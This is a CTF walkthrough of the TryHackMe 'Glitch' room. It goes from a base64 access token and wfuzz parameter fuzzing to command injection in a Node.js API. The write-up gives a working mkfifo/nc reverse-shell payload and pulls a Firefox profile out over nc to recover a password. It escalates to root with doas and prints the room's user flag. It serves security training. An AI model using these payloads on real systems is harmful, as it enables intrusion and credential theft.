Glitch Writeup (TryHackMe)
Type: Pentesting
Difficulty: Easy
We start with out routine Nmap scan which reveals that port 80 (running on Node js) is the only port open out of all 65535 ports.
So we add the ip to our /etc/hosts before proceeding to visit it in our browser and be greeted with this:
The question gives an idea about some kind of access token. Checking the source code of the webpage, we find this interesting function getAccess() which seems to be fetching something.
So we execute the function in the console and get back a string which seems to be base64 encoded.
So we decode it and get the Access token.
Checking the Network Tab of the webpage shows us that the value of the token has not been entered yet, so we enter the value of our Access token and reload the page in the browser to get a different-looking webpage.
Looking at the source code of the new webpage, we see a section /api/items so we try to access it in our browser.
So we fire up BurpSuite to see what is happening when we try to access the page . We see that while trying to send a post request to /api/items we get this message:
Since,we are able to send POST requests.Let us search which parameters are available with wfuzz.
wfuzz -XPOST -u http://ip/api/items?FUZZ=id -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt --hh 45
Thus, we see that Cmd is available.
Now,we fire up burp and send a random request with cmd and it’s working.
Now,I started searching for the payload and I found one
require("child_process").exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f")
I changed the ip,encoded in URl form and POST this one. And,it worked.
Listening to the PORT we have the shell.
we stabilise our shell then with,
python -c 'import pty;pty.spawn("/bin/bash")'
Looking in the directories we get our user flag.
Here’s our user flag:THM{i_don’t_know_why}
After some searching we found a .firefox folder inside /home/user/ directory
We can take advantage of this folder and extract next user’s password…
Firstly we created a tar file of the .firefox folder and sent it to our terminal through nc
After running following command we got the v0id user’s password
firefox --profile b5w4643p.default-release --allow-downgrade
After logging as v0id I searched for some leaks through which we can become root and I found that as doas
i ran
find / -type f -perm /4000 2>/dev/null
and doas was a sus!
After reading about it in doas i used the following command and got the root
doas bash -p
And finally got the root flag!!